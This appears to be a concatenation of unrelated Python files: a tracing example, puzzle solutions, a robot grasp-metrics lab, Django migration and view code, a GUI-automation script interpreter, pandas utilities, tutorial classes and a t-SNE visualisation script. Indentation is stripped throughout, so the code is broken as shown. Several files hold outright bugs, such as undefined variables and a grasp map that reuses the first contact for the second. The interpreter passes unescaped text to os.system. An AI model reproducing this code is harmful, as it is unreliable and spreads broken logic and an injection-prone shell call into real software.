BatchExportSpanProcessor(cloud_trace_exporter)
)
tracer = trace.get_tracer(__name__)
# Adding attributes to spans
with tracer.start_as_current_span("foo_with_attribute") as current_span:
current_span.set_attribute("string_attribute", "str")
current_span.set_attribute("bool_attribute", False)
current_span.set_attribute("int_attribute", 3)
current_span.set_attribute("float_attribute", 3.14)
# Adding events to spans
with tracer.start_as_current_span("foo_with_event") as current_span:
current_span.add_event(name="event_name",)
# Adding links to spans
with tracer.start_as_current_span("link_target") as link_target:
# Creates a span "span_with_link" and a link from
# "span_with_link" -> "link_target"
with tracer.start_as_current_span(
"span_with_link", links=[Link(link_target.context)]
):
pass
# Creates a span "span_with_link" and a link from
# "span_with_link" -> "link_target". This link also has the attribute
# {"link_attr": "string"}
with tracer.start_as_current_span(
"span_with_link_and_link_attributes",
links=[Link(link_target.context, attributes={"link_attr": "string"})],
):
pass
# You can also do a combination of these
with tracer.start_as_current_span(
"foo_with_event_and_attributes"
) as current_span:
current_span.add_event(name="event_name", attributes={"event_attr1": 123})
current_span.set_attribute("bool_attribute", False)
|
def reduce(polymer):
changed = True
#print(''.join(polymer))
while changed:
changed = False
i = 0
while i < len(polymer) - 1:
if abs(ord(polymer[i]) - ord(polymer[i+1])) == 32:
del polymer[i:i+2]
changed = True
else:
i += 1
return polymer
if __name__ == '__main__':
lines = []
with open('day5input.txt') as f:
lines = f.readlines()
print('Part 1: ')
#polymer = reduce(list("dabAcCaCBAcCcaDA"))
polymer = reduce(list(lines[0].strip()))
print(len(polymer))
print('Part 2: ')
print(min([len(reduce([l for l in polymer if l.lower() != letter])) for letter in list("abcdefghijklmnopqrstuvwxyz")]))
|
fi = open("somecode.txt", 'r')
print('hi')
for line in fi.readlines():
for symbol in line:
if symbol == '(':
print('[', end = '')
elif symbol == ')':
print(']', end='')
else:
print(symbol, end='') |
#!/usr/bin/env python -W ignore::DeprecationWarning
"""
Grasp Metrics for EE106B grasp planning lab
Author: Chris Correa
"""
# may need more imports
import numpy as np
from lab2.utils import vec, adj, look_at_general, hat
import cvxpy as cvx
import math
import scipy
def compute_force_closure(vertices, normals, num_facets, mu, gamma, object_mass, gripper_min_width, gripper_max_width):
"""
Compute the force closure of some object at contacts, with normal vectors
stored in normals You can use the line method described in HW2. if you do you
will not need num_facets
Parameters
----------
vertices : 2x3 :obj:`numpy.ndarray`
obj mesh vertices on which the fingers will be placed
normals : 2x3 :obj:`numpy.ndarray`
obj mesh normals at the contact points
num_facets : int
number of vectors to use to approximate the friction cone. these vectors
will be along the friction cone boundary
mu : float
coefficient of friction
gamma : float
torsional friction coefficient
object_mass : float
mass of the object
Returns
-------
float : quality of the grasp
"""
## checking for first point of contact ##
vec_between_vertices = vertices[1]-vertices[0]
grasp_length = np.linalg.norm(vec_between_vertices)
if grasp_length < gripper_min_width or grasp_length > gripper_max_width:
return 0
angle = np.arccos( np.dot(normals[0], vec_between_vertices) / (np.linalg.norm(normals[0]) * np.linalg.norm(vec_between_vertices)))
if abs(angle) >= abs(np.arctan(mu)):
return 0
## checking for second point of contact ##
vec_between_vertices = vertices[0]-vertices[1]
angle = np.arccos( np.dot(normals[1], vec_between_vertices) / (np.linalg.norm(normals[1]) * np.linalg.norm(vec_between_vertices)))
if abs(angle) >= abs(np.arctan(mu)):
return 0
return 1
def get_grasp_map(vertices, normals, num_facets, mu, gamma):
"""
defined in the book on page 219. Compute the grasp map given the contact
points and their surface normals
Parameters
----------
vertices : 2x3 :obj:`numpy.ndarray`
obj mesh vertices on which the fingers will be placed
normals : 2x3 :obj:`numpy.ndarray`
obj mesh normals at the contact points
num_facets : int
number of vectors to use to approximate the friction cone. these vectors
will be along the friction cone boundary
mu : float
coefficient of friction
gamma : float
torsional friction coefficient
Returns
-------
:obj:`numpy.ndarray` grasp map
"""
B1 = np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]])
B2 = np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]])
g1 = np.zeros((4,4))
g1[:3, :3] = hat(normals[0])
g1[:3, 3] = vertices[0]
g1[3, 3] = 1
#g1 = np.linalg.inv(g1)
g1 = g_inv(g1)
G1 = np.matmul(adj(g1).T, B1)
g2 = np.zeros((4,4))
g2[:3, :3] = hat(normals[0])
g2[:3, 3] = vertices[0]
g2[3, 3] = 1
g2 = np.linalg.inv(g2)
G2 = np.matmul(adj(g2).T, B2)
G = np.zeros((6,8))
G[:,:4] = G1
G[:,4:] = G2
return G
def contact_forces_exist(vertices, normals, num_facets, mu, gamma, desired_wrench):
"""
Compute whether the given grasp (at contacts with surface normals) can produce
the desired_wrench. will be used for gravity resistance.
Parameters
----------
vertices : 2x3 :obj:`numpy.ndarray`
obj mesh vertices on which the fingers will be placed
normals : 2x3 :obj:`numpy.ndarray`
obj mesh normals at the contact points
num_facets : int
number of vectors to use to approximate the friction cone. these vectors
will be along the friction cone boundary
mu : float
coefficient of friction
gamma : float
torsional friction coefficient
desired_wrench : :obj:`numpy.ndarray`
potential wrench to be produced
Returns
-------
bool : whether contact forces can produce the desired_wrench on the object
"""
# we look for a solution to the system: desired_wrench = G @ f
## we compute the wrench ##
G = get_grasp_map(vertices, normals, num_facets, mu, gamma)
f, _ = scipy.optimize.nnls(G, desired_wrench) # to get non negative solution
## we check if it belongs to the friction cone ##
forces = [f[:4], f[4:]]
for force in forces:
# condition on the tangential forces
if np.sqrt(force[0]**2 + force[1]**2) > mu * force[2]:
return False
# condition on the normal force
if force[2] <= 0:
return False
# condition on the torque
if abs(force[3]) > gamma * force[2]:
return False
return True
def compute_gravity_resistance(vertices, normals, num_facets, mu, gamma, object_mass):
"""
Gravity produces some wrench on your object. Computes whether the grasp can
produce and equal and opposite wrench
Parameters
----------
vertices : 2x3 :obj:`numpy.ndarray`
obj mesh vertices on which the fingers will be placed
normals : 2x3 :obj:`numpy.ndarray`
obj mesh normals at the contact points
num_facets : int
number of vectors to use to approximate the friction cone. these vectors will
be along the friction cone boundary
mu : float
coefficient of friction
gamma : float
torsional friction coefficient
object_mass : float
mass of the object
Returns
-------
float : quality of the grasp
"""
## we compute the grasp matrix ##
G = get_grasp_map(vertices, normals, num_facets, mu, gamma)
## we build the gravity wrench and see if it can be resisted ##
gravity_wrench = np.array([0, 0, -9.81*object_mass, 0, 0, 0])
can_resist = contact_forces_exist(vertices, normals, num_facets, mu, gamma, gravity_wrench)
return can_resist
def compute_custom_metric(vertices, normals, num_facets, mu, gamma, object_mass, gripper_min_width, gripper_max_width):
"""
Robust Force Closure
Parameters
----------
vertices : 2x3 :obj:`numpy.ndarray`
obj mesh vertices on which the fingers will be placed
normals : 2x3 :obj:`numpy.ndarray`
obj mesh normals at the contact points
num_facets : int
number of vectors to use to approximate the friction cone. these vectors will
be along the friction cone boundary
mu : float
coefficient of friction
gamma : float
torsional friction coefficient
object_mass : float
mass of the object
Returns
-------
float : quality of the grasp
"""
num_tests = 500
parameters = np.array([gripper_min_width, gripper_max_width, mu])
num_parameters = len(parameters)
std_params = np.array([0.005, 0.005, 0.1])
num_success = 0
for i in range(num_tests):
#if i%10 == 0:
# print(' test {}'.format(i))
new_params = np.random.normal(loc=parameters, scale=std_params)
new_mu = new_params[2]
new_min_width = new_params[0]
new_max_width = new_params[1]
num_success += compute_force_closure(vertices, normals, num_facets, new_mu, gamma, object_mass, new_min_width, new_max_width)
score = float(num_success) / num_tests
return score
def robust_force_closure(vertices, normals, num_facets, mu, gamma, object_mass, gripper_min_width, gripper_max_width, stds):
'''
stds = standard deviations to use
'''
num_tests = 200
parameters = np.array([gripper_min_width, gripper_max_width, mu])
num_parameters = len(parameters)
std_params = stds
num_success = 0
for i in range(num_tests):
new_params = np.random.normal(loc=parameters, scale=std_params)
new_mu = new_params[2]
new_min_width = new_params[0]
new_max_width = new_params[1]
num_success += compute_force_closure(vertices, normals, num_facets, new_mu, gamma, object_mass, new_min_width, new_max_width)
score = float(num_success) / num_tests
return score
|
# Generated by Django 2.1.5 on 2019-04-02 01:40
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('ticketingApps', '0011_auto_20190401_1845'),
]
operations = [
migrations.AlterField(
model_name='order',
name='creditcard',
field=models.ForeignKey(db_column='CreditCard_CreditCardID', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='ticketingApps.Creditcard'),
),
migrations.AlterField(
model_name='order',
name='profile',
field=models.ForeignKey(db_column='Profile_UserID', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='ticketingApps.Profile'),
),
migrations.AlterField(
model_name='seatsbought',
name='expirationTime',
field=models.DateTimeField(default=datetime.datetime(2019, 4, 2, 1, 50, 2, 237693, tzinfo=utc)),
),
migrations.AlterField(
model_name='theater',
name='price',
field=models.DecimalField(decimal_places=2, default=10, max_digits=10),
),
]
|
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from ..models import *
from datetime import datetime
# Create your views here.
def index(request, text):
user = request.user
testString = 'auth.patient' in user.get_all_permissions()
if not testString:
return HttpResponseRedirect("/notauthorized")
patient=Patient.objects.get(userNameField=user.username)
appointment = Appointment.objects.get(id=text)
if request.method == "POST":
month = request.POST.get('month', '')
day = request.POST.get('day', '')
year = request.POST.get('year', '')
doctor = request.POST.get('doctor', '')
time = request.POST.get('time', '')
if month == '' or day == '' or year == '' or doctor == '' or time == '':
return render(request, 'patients/patientUpdateCancelAppointment.html',
{"messagenum": get_number_of_unread(user),"name": patient.firstName + " " + patient.lastName, "errortext" : "Missing Required Field", "doctors" : Doctor.objects.order_by("firstName"),
"cancellink" : "/patientdeleteappointment/" + text})
appointment.doctor = Doctor.objects.get(lastName=doctor.split()[1])
appointment.dateTime = datetime.strptime(month + ' ' + day + ' ' + year + ' ' + time + "00", '%m %d %Y %H:%M%S')
appointment.save()
log_add("Patient " + str(patient) + " updated an appointment.")
return HttpResponseRedirect("/calendar")
else :
return render(request, 'patients/patientUpdateCancelAppointment.html', {"messagenum": get_number_of_unread(user),"name": patient.firstName + " " + patient.lastName,
"doctors" : Doctor.objects.order_by("firstName"),
"appointment": appointment,
"cancellink" : "/patientdeleteappointment/" + text})
def cancelAppointment(request, text):
appointment = Appointment.objects.get(id=text)
appointment.delete()
patient=Patient.objects.get(userNameField=request.user.username)
log_add("Patient " + str(patient) + " cancelled an appointment.")
return HttpResponseRedirect("/calendar")
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#vim: set enc=utf8:
# More elaborate GUI-operations
# Supporting the AutoIT syntax would be nice
from .interact import Emulate, Screen
import os
class ScriptFiles:
"""A class for managing the directory with scripts.
The name of the script is the same as the filename."""
def __init__(self, path):
self.path = path
self.filenames = os.listdir(path)
def firstname(self, filename):
try:
return filename[::-1].split(".", 1)[1][::-1]
except IndexError:
print("Filename does not have a first name: " + filename)
return filename
def lastname(self, filename):
try:
return filename[::-1].split(".", 1)[0][::-1]
except IndexError:
print("Filename does not have a last name: " + filename)
return filename
def listscripts(self):
return self.filenames
def getscriptbyfilename(self, filename):
contents = ""
if (filename in self.filenames):
f = open(os.path.join(self.path, filename))
contents = f.read().strip()
f.close()
return contents
def runscriptbyfirstname(self, firstname, settings):
if firstname + ".nai" in self.filenames:
script = self.getscriptbyfilename(firstname + ".nai")
interp = NaiveInterpreter(settings)
elif firstname + ".aut" in self.filenames:
script = self.getscriptbyfilename(firstname + ".aut")
interp = AutoItInterpreter(settings)
else:
if not script:
print("Could not find any contents for that script")
else:
print("Could not find an interpreter for that extension")
return
interp.run_this(script)
interp.close()
class Settings:
"""The settings for a specific automation. Can be expanded later on."""
def __init__(self, guidelay=100):
self.guidelay = guidelay
class Automation:
"""An automation (Automation) consists of a way to send keypresses (Emulate) and a way to read the screen (Screen)"""
def __init__(self, settings):
self.emu = Emulate(settings.guidelay)
self.screen = Screen()
def startapp(self, command):
"""Starts an application by pressing Alt+F2, clicking in the center of the screen and typing in a command."""
e = self.emu
e.alt("F2")
e.shortwait()
e.clickat(self.screen.center)
e.shortwait()
e.type(command + "\n")
e.longwait()
def alttab(self):
"""Presses Alt+Tab"""
e = self.emu
e.alt("Tab")
e.shortwait()
def say(self, text):
"""Types in text, followed by Return"""
self.emu.type(text + "\n")
self.emu.shortwait()
def close(self):
"""Stops the key/mouse emulation"""
self.emu.close()
def getemu(self):
"""Returns the Emulation object for sending keys and mouseclicks"""
return self.emu
def getscreen(self):
"""Returns the Screen object for aquiring and interpreting graphics"""
return self.screen
class GenericInterpreter:
"""A generic interpreter, meant to be subclassed"""
def __init__(self, settings):
self.auto = Automation(settings)
self.emu = self.auto.getemu()
self.variables = {}
self.fdict = {}
def info_msgbox(self, message, title):
"""Display an informal messagebox using Zenity"""
return os.system("zenity --info --text=\"%s\" --title=\"%s\"" % (message, title))
def question_msgbox(self, message, title):
"""Display a messagebox that asks a question using Zenity"""
return os.system("zenity --question --text=\"%s\" --title=\"%s\"" % (message, title))
def warning_msgbox(self, message, title):
"""Display a messagebox with a warning using Zenity"""
return os.system("zenity --warning --text=\"%s\" --title=\"%s\"" % (message, title))
def close(self):
"""Close the Automation object"""
self.auto.close()
def call_function(self, s):
"""Call a function given as a text string. Example: function(arg1, arg2)."""
fun, arg = s.split("(")
arguments = [self.value(x.strip()) for x in arg.split(")")[0].split(",")]
# call the corresponding function with the given arguments
try:
return self.fdict[fun].__call__(*arguments)
except KeyError as e:
print("There is no such function: " + str(e))
return ""
def run_this(self, script):
"""Interpret and execute a script (lines of text)"""
for line in script.strip().split("\n"):
# TODO Interpret lines more than just calling functions
if line.startswith("#"):
# Skip lines that start with #
continue
retval = self.call_function(line.strip())
#print retval
class NaiveInterpreter(GenericInterpreter):
"""An interpreter for a naive scripting language"""
def __init__(self, settings):
GenericInterpreter.__init__(self, settings)
# the function dictionary
self.fdict = {
"msgbox":self.msgbox,
"run":self.run,
"sleep":self.sleep,
"click":self.click,
"print":self.printfun,
"screenshot":self.screenshot
}
def value(self, s):
if s.startswith('"') and s.endswith('"'):
return s[1:-1]
else:
return s
def msgbox(self, message, title="Info"):
"""example: msgbox("Hello World!")"""
return self.info_msgbox(message, title)
def run(self, cmd):
print("Running %s..." % (cmd))
os.system(cmd)
def sleep(self, n):
self.emu.sleep(int(n))
def click(self, x, y):
self.emu.clickat(int(x), int(y))
def printfun(self, msg):
print(msg)
def screenshot(self, filename="screenshot.png"):
fn = "../screenshots/" + filename
# Change which X to take screnshots from
os.putenv("DISPLAY", ":42.0")
# Take a screenshot of the virtual X fb
os.system("scrot " + fn)
class AutoItInterpreter(GenericInterpreter):
"""An interpreter for the AutoIt language"""
def __init__(self, settings):
GenericInterpreter.__init__(self, settings)
# the function dictionary
self.fdict = {"MsgBox":self.msgbox}
def value(self, s):
"""Evaluation of values. Add strings and numbers together, etc."""
#TODO Add more complex evaluation than just True and False...
if s == "False":
return False
elif s == "True":
return True
elif s.startswith('"') and s.endswith('"'):
return s[1:-1]
else:
return s
def msgbox(self, flagstring, title, message, timeout=0, hwnd=0):
"""example: MsgBox(64, "Title", "Hello world")"""
# TODO Support the other flags and paramters that MsgBox supports
# See: http://www.autoitscript.com/autoit3/docs/functions/MsgBox.htm
retval = 0
flag = int(flagstring)
if flag in (0, 64):
# info
retval = self.info_msgbox(message, title)
elif flag == 32:
# question
retval = self.question_msgbox(message, title)
elif flag == 48:
# warning
retval = self.warning_msgbox(message, title)
else:
print("MsgBox, unknown flag: " + str(flag))
# translation to AutoIt return values
if retval == 256:
retval = 2
elif retval == 0:
retval = 1
return retval
|
import pandas as pd
from matplotlib import pyplot as plt
import numpy as np
from PIL import Image as Img
from PIL import ImageTk as imgtk
import os
class DataProcessing(object):
def __init__(self, data):
self.data = data
def get_datetime_from_twelve(self):
data = pd.DataFrame(self.data)
data.to_csv('batch.csv')
data = pd.read_csv('batch.csv')
print(data)
try:
t = data.datetime
except KeyError:
t = data.date
return t
def get_ticker_from_twelve(self):
data = pd.DataFrame(self.data)
print(data)
data.to_csv('batch.csv')
data0 = pd.read_csv('batch.csv')
data = data.columns
return data0[data[0]]
def real_data_to_double(self,real_data):
float_data = [float(x) for x in real_data]
np_float_data = np.array(float_data)
return np_float_data
def generate_n_lenght_list(self, n):
t = []
null = [t.append(i) for i in range(n)]
return t
def list_of_zeros(self, value):
list_of_zeroes = []
empty_container = [list_of_zeroes.append(0) for x in range(len(value) + 1)]
return list_of_zeroes, empty_container
def series_to_list(self, series):
list1 = []
for i in series:
list1.append(i)
return list1
def remove_repeats(self, list1):
list2 = []
for i in list1:
if i in list2:
pass
else:
list2.append(i)
return list2
def find_location(self, value):
i = self.data.isin([value])
c = 0
t = 0
for p in i:
c += 1
if p == True:
t = c
else:
pass
return t
def Convert(self, tup, di):
for a, b in tup:
di.setdefault(a, []).append(b)
return di
def seperate_even_location_odd_location(self):
x = self.data
even = []
odd = []
for i in range(len(x)):
if i % 2 == 1:
even.append(x[i])
else:
odd.append(x[i])
df1 = pd.DataFrame(odd)
df2 = pd.DataFrame(even)
return df1, df2
def dictionary_to_dataframe(self, dic, Keys):
Keys : str
lenght = []
keys = []
values = []
none = [lenght.append(i) for i in range(len(dic))]
none = [keys.append(i) for i in dic]
for i in range(lenght[len(lenght) - 1]):
value = dic[keys[i]]
values.append(value)
df = pd.DataFrame(lenght)
df[Keys] = pd.DataFrame(keys)
try:
df['Values'] = pd.DataFrame(values)
except ValueError as verr:
print(verr)
values_width = []
tuple_values_index = []
for j in range(len(values)):
for i in range(len(values[0])):
tuple_values_index.append((i, values[j][i]))
for j in range(len(values[0])):
values_width.append([])
print(tuple_values_index)
for i in range(len(tuple_values_index)):
for k in range(len(values[0])):
# storing it as tuple because is always going to be one no matter the width the value will be stored as the second value of the tuple
if tuple_values_index[i][0] == k:
values_width[k].append(tuple_values_index[i][1])
else:
pass
for x in range(len(values_width)):
df[f'Column {x}'] = pd.DataFrame(values_width[x])
df.drop([0], axis=1, inplace=True)
'''
or you could have just used :
import pandas as pd
data = {
'Name': ['Microsoft Corporation', 'Google, LLC', 'Tesla, Inc.',\
'Apple Inc.', 'Netflix, Inc.'],
'Symbol': ['MSFT', 'GOOG', 'TSLA', 'AAPL', 'NFLX'],
'Shares': [100, 50, 150, 200, 80]
}
df = pd.DataFrame(data)
making sure that each list in df is of the same lenght
and filling with 0's if it is not
'''
return df # in order to print this on the output summary file fx.to_html('output.html')
def from_csv_to_html(dir_):
files = os.listdir(dir_)
for i in range(len(files)):
file = files[i]
if file.endswith('.csv'):
data = pd.read_csv(r'app\{}'.format(file))
data.to_html('file {i}')
def save_to_text_doc(self, file_name, message):
init_exercise_file = open(file_name, 'w')
init_exercise_file.write(message)
init_exercise_file.close()
def textfile_i_o(self, filename, text, write):
try:
file = open(filename, 'r+')
except FileNotFoundError:
file = open(filename, 'w')
file.close()
file = open(filename, 'r+')
content = file.read()
if write:
file.write(text)
else:
pass
file.close()
return content
def apply_func_to_each_value_of_list(self, input_list, func):
output_list = list(map(input_list, func))
return output_list
def __str__(self):
for property, value in vars(self).items():
print(property,':', value)
return ''.join([property, " : ", str(value)])
def from_string_comma_string_to_int(self,h):
int1 = []
int2 = []
next_number_flag = False
for i in h:
if i == ',':
next_number_flag = True
else:
pass
if next_number_flag == False:
int1.append(i)
else:
if i == ',':
pass
else:
int2.append(i)
x1 = ''
x2 = ''
for i in int1:
x1 += str(i)
for i in int2:
x2 += str(i)
try:
x1 = int(x1)
x2 = int(x2)
except ValueError:
x1 = float(x1)
x2 = float(x2)
return x1, x2
def resize_image(self,width, height, filename):
image = Img.open(filename)
if filename == 'primary.PNG':
width -=60
height -=75
elif filename == 'blue-box.png':
height -= 55
else:
pass
resize_image = image.resize((width, height))
img = imgtk.PhotoImage(resize_image)
return img
|
lotteryPlayer ={
'name' : 'jeffy',
'numbers':(5,9,7,8,6)
}
class LotteryPlayer:
def __init__(self, name):
self.name = name
self.numbers = (5,9,8,9,7)
def total(self):
return sum(self.numbers)
# Instance or creating an object of LotteryPlayer
# Object oriented programming
playerOne = LotteryPlayer("Jimmy")
playerTwo = LotteryPlayer("Jeffy")
print(playerOne.name)
print(playerTwo.name)
class Student:
def __init__(self, name, school):
self.name= name
self.school = school
self.marks =[]
def average(self):
return sum(self.marks)/len(self.marks)
@staticmethod #staticmethod we don't need to pass 'self' as an argument
def goToSchool():
print("I'm going to school")
@classmethod #classmethod it pass Class as an argument
def printName(cls):
print("Hello Hello ")
anna = Student("Anna","MIT")
anna.marks.append(56)
anna.marks.append(65)
anna.printName()
# Since it is a static method, dont need to creat an object/instance
Student.goToSchool()
# Exercise 1
class Store:
def __init__(self, name):
self.name = name
self.items = []
def addItem(self, name, price):
item = {
'name' : name,
'price': price
}
self.items.append(item)
def stockPrice(self):
return sum([item['price'] for item in self.items])
@classmethod
def franchise(cls, store):
return cls(store.name + " - franchise")
@staticmethod
def storeDetails(cls):
return '{}, Total stock Price : {}'.format(store.name, int(store.stockPrice))
storeProduct = Store("Biscuits")
storeProduct.addItem("Britannia",50)
print(storeProduct.stockPrice())
print(storeProduct.franchise("Amazon"))
# Exercise 2
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Authors:
# Luis Cañas-Díaz <lcanas@bitergia.com>
# Alvaro del Castillo <acs@bitergia.com>
#
import logging
import time
from grimoire_elk.arthur import feed_backend
from grimoire_elk.elastic_items import ElasticItems
from grimoire_elk.elk.elastic import ElasticSearch
from mordred.error import DataCollectionError
from mordred.task import Task
from mordred.task_projects import TaskProjects
logger = logging.getLogger(__name__)
class TaskRawDataCollection(Task):
""" Basic class shared by all collection tasks """
def __init__(self, config, backend_section=None):
super().__init__(config)
self.backend_section = backend_section
# This will be options in next iteration
self.clean = False
def execute(self):
cfg = self.config.get_conf()
if 'scroll_size' in cfg['general']:
ElasticItems.scroll_size = cfg['general']['scroll_size']
if 'bulk_size' in cfg['general']:
ElasticSearch.max_items_bulk = cfg['general']['bulk_size']
if 'collect' in cfg[self.backend_section] and \
cfg[self.backend_section]['collect'] == False:
logging.info('%s collect disabled', self.backend_section)
return
t2 = time.time()
logger.info('[%s] raw data collection starts', self.backend_section)
clean = False
fetch_cache = False
if 'fetch-cache' in cfg[self.backend_section] and \
cfg[self.backend_section]['fetch-cache']:
fetch_cache = True
# repos could change between executions because changes in projects
repos = TaskProjects.get_repos_by_backend_section(self.backend_section)
if not repos:
logger.warning("No collect repositories for %s", self.backend_section)
for repo in repos:
p2o_args = self._compose_p2o_params(self.backend_section, repo)
filter_raw = p2o_args['filter-raw'] if 'filter-raw' in p2o_args else None
if filter_raw:
# If filter-raw exists the goal is to enrich already collected
# data, so don't collect anything
logging.warning("Not collecting filter raw repository: %s", repo)
continue
url = p2o_args['url']
backend_args = self._compose_perceval_params(self.backend_section, repo)
logger.debug(backend_args)
logger.debug('[%s] collection starts for %s', self.backend_section, repo)
es_col_url = self._get_collection_url()
ds = self.backend_section
backend = self.get_backend(self.backend_section)
project = None # just used for github in cauldron
try:
feed_backend(es_col_url, clean, fetch_cache, backend, backend_args,
cfg[ds]['raw_index'], cfg[ds]['enriched_index'], project)
except:
logger.error("Something went wrong collecting data from this %s repo: %s . " \
"Using the backend_args: %s " % (ds, url, str(backend_args)))
raise DataCollectionError('Failed to collect data from %s' % url)
t3 = time.time()
spent_time = time.strftime("%H:%M:%S", time.gmtime(t3-t2))
logger.info('[%s] Data collection finished in %s',
self.backend_section, spent_time)
|
""" Given a list of words, list of single letters (might be repeating) and score of every character.
Return the maximum score of any valid set of words formed by using the given letters (words[i] cannot be used two or more times).
It is not necessary to use all characters in letters and each letter can only be used once. Score of letters 'a', 'b', 'c', ... ,'z' is given by score[0], score[1], ... , score[25] respectively.
Example 1:
Input: words = ["dog","cat","dad","good"], letters = ["a","a","c","d","d","d","g","o","o"], score = [1,0,9,5,0,0,3,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0]
Output: 23
Explanation:
Score a=1, c=9, d=5, g=3, o=2
Given letters, we can form the words "dad" (5+1+5) and "good" (3+2+2+5) with a score of 23.
Words "dad" and "dog" only get a score of 21.
Example 2:
Input: words = ["xxxz","ax","bx","cx"], letters = ["z","a","b","c","x","x","x"], score = [4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,5,0,10]
Output: 27
Explanation:
Score a=4, b=4, c=4, x=5, z=10
Given letters, we can form the words "ax" (4+5), "bx" (4+5) and "cx" (4+5) with a score of 27.
Word "xxxz" only get a score of 25.
Example 3:
Input: words = ["leetcode"], letters = ["l","e","t","c","o","d"], score = [0,0,1,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0]
Output: 0
Explanation:
Letter "e" can only be used once.
Constraints:
1 <= words.length <= 14
1 <= words[i].length <= 15
1 <= letters.length <= 100
letters[i].length == 1
score.length == 26
0 <= score[i] <= 10
words[i], letters[i] contains only lower case English letters. """
from collections import Counter
from typing import List
class Solution:
def maxScoreWords(self, words: List[str], letters: List[str], score: List[int]) -> int:
maxScore = 0
cnt = Counter(letters)
cur = Counter()
def dfs(idx):
nonlocal maxScore, cur
for i in range(idx, len(words)):
cur += Counter(words[i])
if not any(cur[k] > cnt[k] for k in cur.keys()):
maxScore = max(maxScore, sum(v * score[ord(k) - ord('a')] for k, v in cur.items()))
dfs(i + 1)
cur -= Counter(words[i])
dfs(0)
return maxScore
print(Solution().maxScoreWords(["dog","catw","dad","good"], ["a","a","c","d","d","d","g","o","o"], [1,0,9,5,0,0,3,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0])) |
import glooper_python_swig_wrap as glooper
import rng_python_swig_wrap as rng
M = glooper.Market()
U = rng.UniformGenerator()
P = rng.ParetoGenerator(10000,1.3)
N = rng.NormalGenerator()
G = glooper.ClassicAgentGenerator(U,N,P,U,U,M,10)
AP = glooper.AgentPopulation(U,G)
|
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.getcwd(), os.pardir)))
import matplotlib.pyplot as plt
import numpy as np
from sklearn import preprocessing
from sklearn.manifold import TSNE
from neural_network.Dataset import FullDataset
from neural_network.SNN import initialise_snn
from configuration.Configuration import Configuration
# In progress. For visualization of encoded data of an SNN using T-SNE or PCA.
if __name__ == '__main__':
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# Config relevant for cnnwithclassattention
use_channelwiseEncoded_for_cnnwithclassattention = True
use_each_sensor_as_single_example = True # default: false
use_channelcontextEncoded_for_cnnwithclassattention = True
# TSNE Embeddings are learned on a sim matrix, not on embeddings itself
use_sim_matrix = False # default false
encode_test_data = False
config = Configuration()
config.architecture_variant = config.architecture_variants[0]
if config.case_base_for_inference:
dataset = FullDataset(config.case_base_folder, config, training=False)
else:
dataset = FullDataset(config.training_data_folder, config, training=False)
# config.case_base_folder
dataset.load()
print("130:", dataset.y_train_strings[130])
print("200:", dataset.y_train_strings[200])
print("700:", dataset.y_train_strings[700])
print("750:", dataset.y_train_strings[750])
print("650:", dataset.y_train_strings[650])
print("550:", dataset.y_train_strings[550])
print("790:", dataset.y_train_strings[790])
print("730:", dataset.y_train_strings[730])
architecture = initialise_snn(config, dataset, False)
if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
if config.use_same_feature_weights_for_unsimilar_pairs == True:
print("config.use_same_feature_weights_for_unsimilar_pairs should be False during TSNE Plot!")
# As TSNE Input either a distance matrix or
if use_sim_matrix == True:
sim_matrix = dataset.get_similarity_matrix(architecture, encode_test_data=encode_test_data)
distance_matrix = 1 - sim_matrix
else:
encoded_data = dataset.encode(architecture, encode_test_data=encode_test_data)
if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
x_train_encoded = dataset.x_train[0]
x_train_encoded_context = np.squeeze(dataset.x_train[2])
x_train_labels = dataset.y_train_strings
x_test_labels = dataset.y_test_strings
else:
# Loading encoded data previously created by the DatasetEncoder.py
x_train_encoded = dataset.x_train
x_test_encoded = dataset.x_test
x_train_labels = dataset.y_train_strings
x_test_labels = dataset.y_test_strings
if encode_test_data:
print("Loaded encoded data: ", x_train_encoded.shape, " ", x_test_encoded.shape)
else:
print("Loaded encoded data: ", x_train_encoded.shape)
# Encoding / renaming of labels from string value (e.g. no error, ....) to integer (e.g. 0)
le = preprocessing.LabelEncoder()
if use_each_sensor_as_single_example:
# Generate new labels
x_test_train_labels = np.tile(dataset.feature_names_all, x_train_encoded.shape[0])
le.fit(dataset.feature_names_all)
numOfClasses = le.classes_.size
unique_labels_EncodedAsNumber = le.transform(le.classes_) # each label encoded as number
x_trainTest_labels_EncodedAsNumber = le.transform(x_test_train_labels)
else:
x_test_train_labels = np.concatenate((x_train_labels, x_test_labels),
axis=0)
le.fit(x_test_train_labels)
numOfClasses = le.classes_.size
# print("Number of classes detected: ", numOfClasses, ". \nAll classes: ", le.classes_)
unique_labels_EncodedAsNumber = le.transform(le.classes_) # each label encoded as number
x_trainTest_labels_EncodedAsNumber = le.transform(x_train_labels)
